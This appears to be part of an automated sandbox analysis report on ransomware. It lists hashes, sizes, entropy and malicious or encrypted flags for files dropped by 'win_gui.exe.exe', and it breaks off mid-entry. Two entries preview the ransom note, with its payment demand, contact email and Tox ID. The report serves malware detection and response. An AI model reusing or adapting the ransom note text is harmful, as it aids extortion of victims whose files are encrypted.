                                MD5:06FBA08C2F6B99E394642F91601CBEE1
                                SHA1:917625C2407D1AB7B470C7BB51748540848200A9
                                SHA-256:63BE3326743630A270D9FD9BB6B5D578779C3F925F5C6CF0448F454D8D569C14
                                SHA-512:947E1EA378BFE394890B08EAA726C7E1DD6EAD5BDF26500B62DBF2E46FCE27E784A81827928849EC3C202AC708A77E501E624B9031562DA0ED352E5FA7DCBBA7
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):33376
                                Entropy (8bit):7.993995561940174
                                Encrypted:true
                                SSDEEP:768:qi0vWkEyFJ6BDv7wopSdwx74vEea6axIrD39h0w:qi0vkyFoBDzwZK+E8sIvDN
                                MD5:A66B3A13DB79977E06C9001026083671
                                SHA1:F764E894545952264CE414223BA17C347936848C
                                SHA-256:1FAEEDCEAE89BB645AC9A51BE197710FCEC3F11430BB9566C06DB4B5C801D6BA
                                SHA-512:CC13546AEBF3A2A26A567FBA3B8A962A6CAD86758DB281AF4DDFE050E21197976F0889A1E7270848B4A8F97372931DF14D505CCBADABBC6D420F0AB0B20775CB
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16992
                                Entropy (8bit):7.988851095684504
                                Encrypted:false
                                SSDEEP:384:4SHivq1dz0VLw1cRnhYd6hJHwt4g7rzpvLoOvSrD7X+VOa:dHinwG5hYd6hpqrzVgX7m
                                MD5:2A872608FA94BF72F34B17E728EF7D61
                                SHA1:3A966CC80CD5259D0323D01E05C619CA271840C0
                                SHA-256:CE85B3B45176D6D79EEB9A3CF429602939E0DE4800A68ED5E144F382C1CE30D6
                                SHA-512:10EEC56A69AAAC53CA3CCE6715432F676A99C4D6CF22C3213E47722F1955B1875EC2701BAA39B78340C3417BE92B305A0B61475C8049241F30AEB19A7064DDD6
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):104002
                                Entropy (8bit):7.9980319293466735
                                Encrypted:true
                                SSDEEP:3072:ohBmlGbGArp8BcJEWekizUZ5+bwwny3O4EJjV:ohBjKArCBcJEJkeUajnye4yV
                                MD5:B04EE71D5F6269D35BF1410D4B7D8651
                                SHA1:516836F2B9AE0D66B19885A004F4A730F3E90D27
                                SHA-256:6B03EBFEA22E71F1A38BFDA19780B45E9E90A84F410BB697A321666610E5B871
                                SHA-512:7597F94441DBB2A6C3D64C63C3D5009B3D41A5E96F2F154A0F94A2FBFB7A8A3518FA61BEFC0E9074264776747CD23A9BC95323371A0E314CA6210AF629A01CCA
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):239616
                                Entropy (8bit):7.9992979133215085
                                Encrypted:true
                                SSDEEP:3072:6uzCX8yp60RzK9l1WWBhahIHudxHlPtgzyraOO2G2BNmqG1UrqwGaUci3R+sjCys:7Mc0E9FiBX7JLLNPZK3/SpIZhAj
                                MD5:1B064D2CDBFC2822BFC1D33DE8D4E570
                                SHA1:331073493E3FF4F3F829EA1528158E25F9EF6D04
                                SHA-256:A59CA69D9029FE932411CA0ADEFBC05147A52A3F96E6516DB8AAEA909699D8DA
                                SHA-512:EF0B2895E60FE52B3DB32EFF0096F96C0EC90119AC181160F6557F0267D21688EC48AB5DE25B78BC874548D8CFA83E1297658A67847EB52CA9FCDCC7B15AC35D
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1810
                                Entropy (8bit):7.887694974950454
                                Encrypted:false
                                SSDEEP:48:b3HOZiNZOiKLPdixbh8Yhyd/WyYu+MAVMJg6TZ:TOUGrdixbh9ydevuAVOZ
                                MD5:C69165DA29323A5F78D1142A66BC2772
                                SHA1:D50D613330E1B96BD3EA24ADFCC3F222C25D8E9F
                                SHA-256:209F0761A443ED47BE665CEB9FF90FD155E9F3B3692C5AB2929C20906E46F6C7
                                SHA-512:EE07FE35D61EF4EEECDE16922CCAAB25D5F4359C447831F3296B025E0C91C1D823DE434DC29F0B5F89A890F890E09D7D1FCCC6DD107124F5A10A73DBEEA5E258
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):41900
                                Entropy (8bit):7.996471724365494
                                Encrypted:true
                                SSDEEP:768:oRhNucqUX4BY485ghCg8ub3igCLGw2zjg920xvJmc1Gd+SBkbguNtB:oRZlXh485ghzegC0gs0xvJnGxB0/
                                MD5:A15CA187BE4366D15C4BDA96B7ADBE16
                                SHA1:769CAB5AD42189790DCC5247B2224E2467097338
                                SHA-256:AB149892ECCEC18837C91F75E5D1ABE8210AB356248E4F86DFD08D78EFCB8691
                                SHA-512:AC3805D87C1737919F60D7D9ABD3A5A6CB39C3240477FA335BEA494B313BA68EFD5AB6D3343850A95F3DB243CF51F51F9E9899FC6FC0B775EB9AA3C566E8F450
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3853
                                Entropy (8bit):7.948437641226424
                                Encrypted:false
                                SSDEEP:96:MkG+vsghAhLdF8wDQeT+/G6e6bQ7jyvOqAevuAVOB:pkghkBF8IH6G6e6EsM+VOB
                                MD5:7A27801891A38F95361895D384360272
                                SHA1:F8E225FED54B8AE7B8813EE25000E010D90410B4
                                SHA-256:E84562CF35CCC3C16A2E228AF45E7159E5003E35A28645B4BCEB6E81C21F2F4B
                                SHA-512:2FF3386BBAACE820B3CDBF1E9CEFD009142B99F92B8294B81260542E84B344C739669629946D1E4CDB84F87CC03D1314D633187F9C54BB53DEB878F3AB907325
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):115908
                                Entropy (8bit):7.998373210833385
                                Encrypted:true
                                SSDEEP:3072:cqkD56a7D41homKFbcokpi1bF4TP8Acxaag9z28h:cqy/7Shmkpa4wAgaR9zbh
                                MD5:0901A2263495C881B44FCA49874BC530
                                SHA1:65439B92136E9075EEB29B3287AA68E3392855D0
                                SHA-256:0DABE5EA29A2EF1EF0C6B8D0857719FD6353B84CE0AD1A6A166D8F8874A33553
                                SHA-512:39E9435A89361C17FF520104C1FAD28ED21907AA187728827B49618BE858F754D2A0B21768AE786C0FB5D7011AB1E4A13DD04466345A54C2333524198E7E3385
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):101984
                                Entropy (8bit):7.998340541249593
                                Encrypted:true
                                SSDEEP:3072:1cizNUJYaZnBktXO6Je/G/ri+8Tqf71vyTjU:L+R2tXs/G/rd8Tqf7ATjU
                                MD5:484F7DC87F428D7114D2AC6C88B6DF64
                                SHA1:CC29EEE97A2F8DDEBE8768CB01C5BE419EACFBA1
                                SHA-256:2723E81492A40491693727037035C621839C2A565240D83414D50D1A96CC4CC0
                                SHA-512:D2AF4BAF55DC37C983D4C7986482DC2B6416598963978531169544ADACE91DFED6619CB8ECF895B7C1DF19F4137B91BE89820D83286E75F872264B7DE692D99C
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):67168
                                Entropy (8bit):7.997716078598476
                                Encrypted:true
                                SSDEEP:1536:lsmlbolwGfcq0jYJL2dptjMMhRv3YM3YOAisYY1Q:lsLwGfcq0kJI3XRoFTPi
                                MD5:3C9AE74E2B201BAC3E28FD24A91158F7
                                SHA1:8AF3F674A4A207C69798DA674C75AFF3023046D2
                                SHA-256:1B2AD069A5E1D1AAADB2095E9A8406C4DDF90186EA7F3FF1BE819297E269FF22
                                SHA-512:6C181BB91F288168D5122D49B6C8AB22A4E7F7ABEDDC9BBBDD21672B95F64B2D373CCFB5F359AD3BBD4ED368ABF2FADC096FE78B18055ABAAEED7C1FF40A69ED
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1842272
                                Entropy (8bit):6.815005846114559
                                Encrypted:false
                                SSDEEP:49152:g0cQQ94iZNrLIBjhTt0deROyyIjnRnUYA:g0zQSinIBF+mW2R9A
                                MD5:D292E049F530D866E36754983435A9F9
                                SHA1:512D6130F4EC8C69F64ED550BAEE8B73B7942D48
                                SHA-256:60889E9C13969A457B6DD581108B5F76DD0CCB165467DD82976C776916F74B71
                                SHA-512:ECA5E73929446865850660DDA7257EBB64A586D929EB591BC8C7AC3A9B6A81E56B16E5BC50DA6812C4405B608A32B7DC3CD0274811C70A757B944F229D822F11
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1842272
                                Entropy (8bit):6.815005846114559
                                Encrypted:false
                                SSDEEP:49152:g0cQQ94iZNrLIBjhTt0deROyyIjnRnUYA:g0zQSinIBF+mW2R9A
                                MD5:D292E049F530D866E36754983435A9F9
                                SHA1:512D6130F4EC8C69F64ED550BAEE8B73B7942D48
                                SHA-256:60889E9C13969A457B6DD581108B5F76DD0CCB165467DD82976C776916F74B71
                                SHA-512:ECA5E73929446865850660DDA7257EBB64A586D929EB591BC8C7AC3A9B6A81E56B16E5BC50DA6812C4405B608A32B7DC3CD0274811C70A757B944F229D822F11
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):557664
                                Entropy (8bit):7.49347164270054
                                Encrypted:false
                                SSDEEP:6144:u5lLX+EGb5R3jHi8660XBlMOrjkf0H05yqE6Hl0ChW0+ksllAXBu0lWGWU4K4Pnq:AlLWXHWvxem2g7XO3LWUoook9eiwcdp
                                MD5:F9BF6BE34C67E9349A0F502DA86FBCD0
                                SHA1:A43BC256D1D4CD807565106C748075A7D9DF1F75
                                SHA-256:CCC82C57B48EA9FCBC5CAE476A76F51EF243D62228294D3DBB954D42037942B5
                                SHA-512:F75CD371D9E140C26840DE56D161B1F338FE6E97DD6A7598C0EF1914B700D08A2DF4E5B7B37B5CF2816B7E5102F416ABFF00C2EEA2761D4EE4E5774F1264CD55
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):557664
                                Entropy (8bit):7.49347164270054
                                Encrypted:false
                                SSDEEP:6144:u5lLX+EGb5R3jHi8660XBlMOrjkf0H05yqE6Hl0ChW0+ksllAXBu0lWGWU4K4Pnq:AlLWXHWvxem2g7XO3LWUoook9eiwcdp
                                MD5:F9BF6BE34C67E9349A0F502DA86FBCD0
                                SHA1:A43BC256D1D4CD807565106C748075A7D9DF1F75
                                SHA-256:CCC82C57B48EA9FCBC5CAE476A76F51EF243D62228294D3DBB954D42037942B5
                                SHA-512:F75CD371D9E140C26840DE56D161B1F338FE6E97DD6A7598C0EF1914B700D08A2DF4E5B7B37B5CF2816B7E5102F416ABFF00C2EEA2761D4EE4E5774F1264CD55
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):215136
                                Entropy (8bit):7.999161498696595
                                Encrypted:true
                                SSDEEP:6144:4h88zHMa0i+3mBWDXPGyo3h7/P8XFbSB7v7SHw:wKRt2IXPG9hP8kBcw
                                MD5:CF05EE704574703C1771E218AA4E8A48
                                SHA1:1896EC6BF1F5EC6BFE3D10EF8FDDB76E1C3086D1
                                SHA-256:F2631ABAFACEA31599783EDAFA3B308D2EE3506C5726F65716DDB77E0463D28F
                                SHA-512:6FFDA10AC87E1A68023E6BBF4E828C294D0E9DC70A3835C9EB50E98E9CC7A4CDD2CEE3B1C37CB0343CA625F734A5061AA9A40C9F4BBA3DF5A1235C81FEC266A8
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):193632
                                Entropy (8bit):7.9990381381583955
                                Encrypted:true
                                SSDEEP:3072:bnghRMFOTDEVtWJAgqYDECV0YFA9Js0hijdqtZ24Lgh4ibkCXEqh5GU34tq+WTyf:jgh6Nt8rqYR0YF4m0jshsW5h4tayaEkO
                                MD5:F98E4D5703481FB57420CD059A5FE721
                                SHA1:7B087E5E5243BEBC9BD243962BD442D5D334FC34
                                SHA-256:038813DDD21AE7785F45BF0156F4755FC1CD16CB5590798C2F0C134E33C3F386
                                SHA-512:CDA905D980B2F848B63FAE5DCC806E744F5A29F44EB58ECB34435DAF9E5096BF109F8984DB2A492607ED6637FA81CA873397E4C80171FB05DBAF446BE59F37CC
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):953440
                                Entropy (8bit):7.050376048576232
                                Encrypted:false
                                SSDEEP:12288:IU6cxQiuWpwtIy6Rmi78gkPH3aPI9vyVg/0paQuj3IkdPyt6KNt5lTXjtpU:IeeWp/DRmi78gkPXlyo0Gkl/jrU
                                MD5:38DFB2371995085D08FF680B0904E367
                                SHA1:758DA052FDC9CBF7251F7F90215BC350053CB091
                                SHA-256:BE5416C96E13EB90CCC4AB2337991D8E2D8CB362691FA28E9C45CB32698AE45C
                                SHA-512:CAF2FB8AD25957C62249A4F5821FFE2F4DB7C115CC7E2C444B4BE513193FA7B310018CC3B4B5DD75C1DFBF1A25EA22C18E623871BDC2FE206E91D7BD920D6D1B
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):953440
                                Entropy (8bit):7.050376048576232
                                Encrypted:false
                                SSDEEP:12288:IU6cxQiuWpwtIy6Rmi78gkPH3aPI9vyVg/0paQuj3IkdPyt6KNt5lTXjtpU:IeeWp/DRmi78gkPXlyo0Gkl/jrU
                                MD5:38DFB2371995085D08FF680B0904E367
                                SHA1:758DA052FDC9CBF7251F7F90215BC350053CB091
                                SHA-256:BE5416C96E13EB90CCC4AB2337991D8E2D8CB362691FA28E9C45CB32698AE45C
                                SHA-512:CAF2FB8AD25957C62249A4F5821FFE2F4DB7C115CC7E2C444B4BE513193FA7B310018CC3B4B5DD75C1DFBF1A25EA22C18E623871BDC2FE206E91D7BD920D6D1B
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):701024
                                Entropy (8bit):7.300693280007674
                                Encrypted:false
                                SSDEEP:12288:HW0pFmql9C80qN+8rKhUdTC/wE1ZDRrH1hDMYOObBn:LFTl9P2owwYOOb9
                                MD5:0B90D1BC58FDA7B314E21DA3FB95AA38
                                SHA1:ED0BD1279468CB8A9F7C0F4028344B53C5B71214
                                SHA-256:ECF0AD2033387D91EB12965DAAEF79506D35742D81DC04535F2F89FF99C2819A
                                SHA-512:9A75187984C76AD1E47DCFB1FC88C365C9237CCDF9564F9A9427AF42DC1B77B374069D1B56045628AA36E16F58024DFF69505E129165D5DC59C2E2AA6CF182DB
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):701024
                                Entropy (8bit):7.300693280007674
                                Encrypted:false
                                SSDEEP:12288:HW0pFmql9C80qN+8rKhUdTC/wE1ZDRrH1hDMYOObBn:LFTl9P2owwYOOb9
                                MD5:0B90D1BC58FDA7B314E21DA3FB95AA38
                                SHA1:ED0BD1279468CB8A9F7C0F4028344B53C5B71214
                                SHA-256:ECF0AD2033387D91EB12965DAAEF79506D35742D81DC04535F2F89FF99C2819A
                                SHA-512:9A75187984C76AD1E47DCFB1FC88C365C9237CCDF9564F9A9427AF42DC1B77B374069D1B56045628AA36E16F58024DFF69505E129165D5DC59C2E2AA6CF182DB
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):58913
                                Entropy (8bit):7.996806507601204
                                Encrypted:true
                                SSDEEP:1536:zx0pfyVr3ztIVQ63w/ZZeQeNcyUQtL/m6IIV0a:+6FR+FKZZ2N5Ll6a
                                MD5:035B0022FB3F452B823519BFB1F3F64A
                                SHA1:F8D5F6C88EA7F2A1680B016FACEC2D0929C1185B
                                SHA-256:65CE658EB2665C153CBD68D935EE58867E43274ED8E6FCA9CD59F4D6673A8BD4
                                SHA-512:6456E69C2448FCD689641816F5200DE97E62D2777A26EA75DE7E54FEDC275791AE70D331386952CE4D30D21F0D55D4F282294EBAAC137306A1D9D0CCDEE3A179
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):58913
                                Entropy (8bit):7.996806507601204
                                Encrypted:true
                                SSDEEP:1536:zx0pfyVr3ztIVQ63w/ZZeQeNcyUQtL/m6IIV0a:+6FR+FKZZ2N5Ll6a
                                MD5:035B0022FB3F452B823519BFB1F3F64A
                                SHA1:F8D5F6C88EA7F2A1680B016FACEC2D0929C1185B
                                SHA-256:65CE658EB2665C153CBD68D935EE58867E43274ED8E6FCA9CD59F4D6673A8BD4
                                SHA-512:6456E69C2448FCD689641816F5200DE97E62D2777A26EA75DE7E54FEDC275791AE70D331386952CE4D30D21F0D55D4F282294EBAAC137306A1D9D0CCDEE3A179
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5633
                                Entropy (8bit):7.966065574648915
                                Encrypted:false
                                SSDEEP:96:WKlHmY02RY0ORo7jSm3z3UlFrMbXU0p56+5q3WiQWb2tauZo6wH28sgevuAVOD:WKlnY0Tb3glFwbXU0Td8hx68Z9Wu+VOD
                                MD5:FF03E05D98E5BB3005CB2E05E1125CFF
                                SHA1:FE8073CFF60B2D46C7EA351E11D7EED4F63BEA9F
                                SHA-256:A638AB51CCD36F76B699FEEE00F47260D990112080CA2E9C3B4255B4FF2910E1
                                SHA-512:FCD4ED8405EA8E963257AB661A22B501ABCDEAEF3A402D7F46C940A54833695859DF371F1B7C7E77BBA1988AF98375137B1255A05E5447C6B370948E5FE49EC7
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5633
                                Entropy (8bit):7.966065574648915
                                Encrypted:false
                                SSDEEP:96:WKlHmY02RY0ORo7jSm3z3UlFrMbXU0p56+5q3WiQWb2tauZo6wH28sgevuAVOD:WKlnY0Tb3glFwbXU0Td8hx68Z9Wu+VOD
                                MD5:FF03E05D98E5BB3005CB2E05E1125CFF
                                SHA1:FE8073CFF60B2D46C7EA351E11D7EED4F63BEA9F
                                SHA-256:A638AB51CCD36F76B699FEEE00F47260D990112080CA2E9C3B4255B4FF2910E1
                                SHA-512:FCD4ED8405EA8E963257AB661A22B501ABCDEAEF3A402D7F46C940A54833695859DF371F1B7C7E77BBA1988AF98375137B1255A05E5447C6B370948E5FE49EC7
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8384
                                Entropy (8bit):7.976165327536036
                                Encrypted:false
                                SSDEEP:192:B8ypkKiiusW5GfAWDBy6ABiu4DAXejAQrRD0ekN1v11+VOdo:BpSius3fATXBpejAQrRwe8xb+VOK
                                MD5:E2B31AD99DC24286C49D7C9CFBD6D249
                                SHA1:5FE73DB16D95E33949B1A193C49EEA264078C9B9
                                SHA-256:96D0638287AF3EA33CF1B5C51CC67B40BE2AB29650FFE1BD9801B408DFACB0AD
                                SHA-512:2F89905544EC75DBF192D5823B8E059FF882FF8088E273981A643B315BFE1D1A561F92BCDDDCB825AD30A2CD4ED20AC30724F178160D390F474CBA4F98D0EF58
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8384
                                Entropy (8bit):7.976165327536036
                                Encrypted:false
                                SSDEEP:192:B8ypkKiiusW5GfAWDBy6ABiu4DAXejAQrRD0ekN1v11+VOdo:BpSius3fATXBpejAQrRwe8xb+VOK
                                MD5:E2B31AD99DC24286C49D7C9CFBD6D249
                                SHA1:5FE73DB16D95E33949B1A193C49EEA264078C9B9
                                SHA-256:96D0638287AF3EA33CF1B5C51CC67B40BE2AB29650FFE1BD9801B408DFACB0AD
                                SHA-512:2F89905544EC75DBF192D5823B8E059FF882FF8088E273981A643B315BFE1D1A561F92BCDDDCB825AD30A2CD4ED20AC30724F178160D390F474CBA4F98D0EF58
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):13402
                                Entropy (8bit):7.983640080296722
                                Encrypted:false
                                SSDEEP:384:+mpv/GJ6M/D7VCnXSgU7OQcnf9OWy9+VOc:+K/GJ6M77VgUKB0jA
                                MD5:E791B474B6F93C9A5406DDAE97DC16EF
                                SHA1:7E16B6B66D8814491BBF3BCAA68F9823EE163C3B
                                SHA-256:102E86CDA6204DD97F7A424586A3FDAC24BD94CDBC558E1956B2B6DE69E71E44
                                SHA-512:36AAAD15E891365F21AA1460258AC99CD58F067CF66B6DAD41E050E59AB46A8F11299A2DA0CDB4236A9B56B7556989F597BD4EF2ECBBCBDD7E073E57ECAF98D9
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):13402
                                Entropy (8bit):7.983640080296722
                                Encrypted:false
                                SSDEEP:384:+mpv/GJ6M/D7VCnXSgU7OQcnf9OWy9+VOc:+K/GJ6M77VgUKB0jA
                                MD5:E791B474B6F93C9A5406DDAE97DC16EF
                                SHA1:7E16B6B66D8814491BBF3BCAA68F9823EE163C3B
                                SHA-256:102E86CDA6204DD97F7A424586A3FDAC24BD94CDBC558E1956B2B6DE69E71E44
                                SHA-512:36AAAD15E891365F21AA1460258AC99CD58F067CF66B6DAD41E050E59AB46A8F11299A2DA0CDB4236A9B56B7556989F597BD4EF2ECBBCBDD7E073E57ECAF98D9
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5979
                                Entropy (8bit):7.9728873486257115
                                Encrypted:false
                                SSDEEP:96:5572G3V8P68a8mVUR8nECBAgxE2IhscGe2nBq2jN1E5WevuAVOu:z9aSpbUqEKAnHhscGe2nE2jLE5W+VOu
                                MD5:F0F4A6A4C43856EEDD5086B3B76FA106
                                SHA1:1EA8FC991F29F05B405021683FFBD69992D6E203
                                SHA-256:2D390477DBF94AAE2B0000D47B4A3AD5319CEDF48D21DE43875BF560B0D87DA3
                                SHA-512:ECFC0584EB595F81E8FA7177463B71C4DA02C586DC089432AF53BE7B7E4496E3D2CDB9FB5A5F96FD77897D80BF9D8508F379C579764ED03D8758B36FD851BB12
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5979
                                Entropy (8bit):7.9728873486257115
                                Encrypted:false
                                SSDEEP:96:5572G3V8P68a8mVUR8nECBAgxE2IhscGe2nBq2jN1E5WevuAVOu:z9aSpbUqEKAnHhscGe2nE2jLE5W+VOu
                                MD5:F0F4A6A4C43856EEDD5086B3B76FA106
                                SHA1:1EA8FC991F29F05B405021683FFBD69992D6E203
                                SHA-256:2D390477DBF94AAE2B0000D47B4A3AD5319CEDF48D21DE43875BF560B0D87DA3
                                SHA-512:ECFC0584EB595F81E8FA7177463B71C4DA02C586DC089432AF53BE7B7E4496E3D2CDB9FB5A5F96FD77897D80BF9D8508F379C579764ED03D8758B36FD851BB12
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10227
                                Entropy (8bit):7.982331981122129
                                Encrypted:false
                                SSDEEP:192:K1ul4OasLJSfjLQrkxB/aV2kn3L/KIIH7kWOGWIAa+yGwaUv+VOM:KQ4O1AIIbY22SAWOGb+yGov+VOM
                                MD5:63ED1D2EF8657E967CD5C711F1DDB816
                                SHA1:EB1B1784A58724E4D31B4899ED7ACF35EFE404C7
                                SHA-256:D951C7497BA7236C0F7843EF213072B818FC4F08528E1075CA8F358F0C3FAD7F
                                SHA-512:4E78FB6851B17AF78FAF7FB5F0262BD716AA7FD5564350F33A24CBD7F0B95FE01400ED8C11E1F221B322438832072B815C773DC4330DEA7CAE1005182C701D60
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10227
                                Entropy (8bit):7.982331981122129
                                Encrypted:false
                                SSDEEP:192:K1ul4OasLJSfjLQrkxB/aV2kn3L/KIIH7kWOGWIAa+yGwaUv+VOM:KQ4O1AIIbY22SAWOGb+yGov+VOM
                                MD5:63ED1D2EF8657E967CD5C711F1DDB816
                                SHA1:EB1B1784A58724E4D31B4899ED7ACF35EFE404C7
                                SHA-256:D951C7497BA7236C0F7843EF213072B818FC4F08528E1075CA8F358F0C3FAD7F
                                SHA-512:4E78FB6851B17AF78FAF7FB5F0262BD716AA7FD5564350F33A24CBD7F0B95FE01400ED8C11E1F221B322438832072B815C773DC4330DEA7CAE1005182C701D60
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11849
                                Entropy (8bit):7.985370744892276
                                Encrypted:false
                                SSDEEP:192:6UWDhY2WtcjAHj5IBB6zsMUe53+QTHR437u73ZQKKUdvd0QdZ3/9ZCrgAOAK5upx:QY2Wtc21IBkzs1e5tTHREWSh613XCra8
                                MD5:070E3EADB02E8B641CB7D523DA1585D5
                                SHA1:2F9C9182DF9C65B4288B74510899B2969031A326
                                SHA-256:1FC14658B739682DEDC6733579C4656657A805BD7F7A7E5067BB01A62A9C826D
                                SHA-512:C2E4BDD0B1FE140634892164DBC178EE48868845E739A13BBA8475B2819735C5CC87B921D98F4FF0538F74EA5588DFE8BF32AE0F6781CA06C4488D36F2007CA4
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12469
                                Entropy (8bit):7.9846505850483025
                                Encrypted:false
                                SSDEEP:384:867Lu0VXpeCt1zAcwZyLmZ+nXYcg0+VOu:L/1DekNPwZ/+nI0K
                                MD5:BBCA6F537F6CE990335CD94EB24483A1
